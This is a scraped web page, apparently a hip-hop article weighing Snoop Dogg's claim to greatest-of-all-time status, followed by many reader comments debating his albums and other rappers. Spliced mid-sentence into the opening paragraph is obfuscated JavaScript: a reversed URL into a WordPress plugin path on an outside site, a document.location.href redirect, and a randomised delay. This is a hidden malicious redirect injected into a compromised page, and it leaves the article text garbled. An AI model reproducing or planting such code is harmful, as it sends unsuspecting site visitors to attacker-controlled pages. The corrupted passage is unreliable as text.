Do math. 25 years. 30 million sold worldwide. 15 solo albums. Scores of mixtapes and collaborative albums. At least two classic releases. The first was The Chronic. You can’t understate the importance of The Chronic in any context and Snoop’s all over it. He’s is a writer on 13 of 16 joints which is super significant. That’s like Rae and Ghost on the Purple Tape if Ghost wrote for Rae, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}too. And that’s just the beginning…

Question about GOAT status. Are ppl like Zach de la Rocha and Mike Shinoda disqualified from GOAT conversations because the majority of their work is more in line with the rock genre or are they and others like them able to be considered?

  2. Savant aka Stanstro says:

If you tell me Snoop is the greatest hip hop entertainer (or hip hop brand) of all time, I'll roll with it. I'm not hearing that he's the greatest rapper, though. Too many bad albums, and not enough topical range.

  3. Julius Praleika says:

But does anybody really consider Snoop their favorite artist?

  4. BlabsMcGillicutty says:

Depends on what kinda music u like. If you like East Coast hero hustler shit you might say Jay is the Goat. But if you like that West Coast G-Funk its gotta be Snoop.

  5. kryslewin4 says:

Snoop is a Pillar of Hip-Hop, he's indispensable in the grand scheme of hip hop and rap.

Uncle snoop has kept the old school alive and made way for the new school to rise at the same time. He is in the top ten no doubts!

Where is Ice Cube, he has done more for hip hop that anyone short of Dr.Dre. Plus he gave us it was a good day nuff said.

  15. Kahn's Hip-Hop Toy Box says:

You can't have more "slept on" and borderline wack albums than epic albums and still be in the GOAT convo. Snoop might be the most famous rapper on the planet but he has 1 GREAT album, 1 good album and the rest are just songs here and there we like. Its that simple.

  16. Jason Tyo says:

Doggfather has some legendary tracks. I love "Up Jump Tha Boogie" , Snoop's "Vapors", and "Downtown Assasins " is such a banger. Dont sleep on Doggfather

  17. DaBrute says:

I remember the first time I heard Sexual Seduction my mind was blown trying comprehend what I was hearing. that was such a departure from the Snoopy D O double jizzle I know

  18. West says:

Snoop is great but to say is the greatest of all time is a stretch here. Credit to his career and everything but lyrically can you say he's more lyrical then Rakim, Wu Tang Clan (Minus U-God), Immortal Technique, RA The Rugged Man, Nas, Mos Def, MF DOOM, Sean Price (RIP), Guru (RIP) etc! Just to name a few. Now career LL Cool J, Ice Cube, Ice T etc! Now as a rapper which anybody can be now in days i would say he's one of the best. But to say all time i don't agree

  19. Kyle McDermott says:

More of these please!!!!!!!! I'm definitely with everyone else. We need a Rakim episode, an Ice Cube episode. And for hip hop's sake we need a Big Daddy Kane episode. I could go on and on. Big Boi. Common. Kanye. The Game. Mos Def. Talib Kweli. 50 Cent. GZA/Genius. Method Man. LL Cool J. In due time, please, sir.

  20. Miles Prower says:

Snoop Dogg is the hip-hop Madonna

  22. Lcarter52 says:

you have your own channel??? nice dude!!!!

  23. kozelekoberst says:

it'd be great for you to do an episode on bay area rap, specifically artists like Mac Dre (RIP) and Andre Nickatina. Super underrated on the grand scale, but masters of the art of the game for sure.

  24. taaj howell says:

    Rakim, method man, mf doom

  25. dePrinced says:

Snoop is definitely slept on in GOAT conversations, but I think he suffers from the same problem that Eminem does that keep him from deserving the top spot, or at least why people forget him in GOAT conversations. Eminem gets brought up all the time but I think his race has a lot to do with that. Snoop doesn't have that. I think what Snoop is missing from the GOAT conversation is the personality. He just doesn't command that same aura, that same might, that say, Jay Z does. Part of that I think is that he does so much. When you do as much as he does, nobody would do everything exceptionally well. He has too many weak joints, too many corny skits, too many pop features for anyone to want to give him the same respect that they'd give to the Notorious B.I.G. He's so goofy and lovable and community oriented that he fits right in in that Uncle Snoop role, but the GOAT needs to be a leader, a warrior, and too much of Snoop's career is him just fucking around with some half baked idea. Uncle Phil can't be the Fresh Prince.

  26. Russell Jones says:

I think he is Greatest Rapper Alive.

  27. Russell Jones says:

And I don't agree with Da Doggfather. I love this album. It's different but its great.

  28. Braymisunderstood Genius says:

im happy you did this video bc hes in my top 5. Hes got a catalog thats very strong. When you go back and listen to the no limit era his albums was good, hes carried the real words of the lifstylee of a wc gangsta. 20 years into it and hes still got albums and singles that will last another 20 years specially on the west. every young rapper on the west coming up wants to work wit snoop. his new album is great! he still can rhyme hard like he did in the younger days. He is a legend

  29. FB 456 says:

Anything outside of the music don't count for Hip Hop

  30. J 1 says:

White ppl and pop & rock have their icons, Micheal Jackson and Elvis. We have ours Snoop,Biggie, Tupac, Nas ,Wu Tang ,and Jay Z .
Even tho dre and puff aren't rappers they are directly responsible for classics and a major influence on the culture.
Idc about today's fashion so much, but I do think things need to get just a little more serious than the mumble rap dirty south Bullshit out here .
That's what I wanna see in the next decade, a little more substance, that and I wanna see Blacks and Hispanics come even closer together, and support each other more, believe me there's strength in numbers .

  31. Trey aka Tech G says:

Snoop Dogg is unoutdated he can jump on a track anytime

  32. Yanuar Fahmi says:

The Legacy of Akon in Hip Hop

  33. Ondřej Machovský says:

no mention of neva left? dope album

  34. Amelia Ward says:

Best rapper of all time… Hosts a game show and cries like a baby on instgram. Oh yea, snoop is hard AF.

  35. DemiGodX says:

when it comes to live performances Snoop is definitely the best rapper to do it. I look at Hip Hop sorta like a league where you had MVPs and Snoop at one point in time was the league MVP. The Chronic and Doggystyle were game changers. In the 90s Snoop had this larger than life mystique about him. It's hard to explain but he brang this sense of realism to Hip Hop where people started viewing Hip Hop more artistically. It had melody and the storylines were very vivid and I think those two albums were monumental in changing the face of Rap. So Snoop definitely should be up there and it's easy to forget the impact he made because his newer material in my opinion is corny and I think when rappers stay in the game too long they may tarnish the legacy they've built by releasing mediocre stuff. Kinda like in Boxing when a fighter continues to fight past his prime and it's disheartening to see because they aren't as hungry anymore and doing it for the money.

I gotta make an exception for Eminem though. I think he's able to sustain longevity because he still has that hunger and passion. All his albums sound different from each other and I think he does that to keep himself motivated. It's like he's always hunting for new ideas and innovative ways to rhyme or attempt to create something that hasn't been done before. And I think that creativity keeps him motivated opposed to someone who's just doing it for a paycheck.

    Still waiting for tupac goat

  37. TheVrangov says:

What about a Breakdown for Gang Starr, Talib, Joey, Three 6 or another on Wu- Tang? Respect!

  38. jwonder973 says:

If Snoop isn't the GOAT, then he's definitely the COAT. The Coolest Of All Time.

  39. Gustav Olofsson says:

1 classic and wrote a part of the chronic, nothing else. snoop has literally only had 1 classic and rest of his work is decent at most. There is no argument that could make him top 5.

  40. Victor Martinez says:

You need to do a greatest on KiD CuDi

  41. martyc909 says:

Snoop has always been my favorite. I don't think he's the greatest, and I barely have him in my top 15. But, I will say when I am at a lost to put on something to listen to, Snoop becomes the default or the very least a DPGC affiliate.

  42. Hasan Mir says:

WHAT????????????? Doggfather isn't a great album? Come on!!!!!!!!! Doggfather is a fantastic album. The only reason people say it isn't a great album is because it is the follow up to Doggystyle, and NO snoop dogg album could have followed that album and been thought of as a great album. However, if you take Doggfather in isolation, it is a superb album with lots of incredible tracks on it.

  43. Jonathan Jones says:

Snoop need to kick Dr Dre in the ass and do more music together. Dre telling everybody he's always in the studio. Put it out

  44. Phenix Lopez says:

Can you do one on Jadakiss

  45. Justin Anschutz says:

You seem to be impressed by some real mediocre bullshit! Snoop is the definition of overrated and entitled.

  46. Lcarter52 says:

Justin man, just wanna say I love your videos and your analysis of hip hop. My first video of yours was 'Is Tech N9ne the G.O.A.T?' and I've been hooked since.
great job and keep it up man.

    Much love from Nigeria .
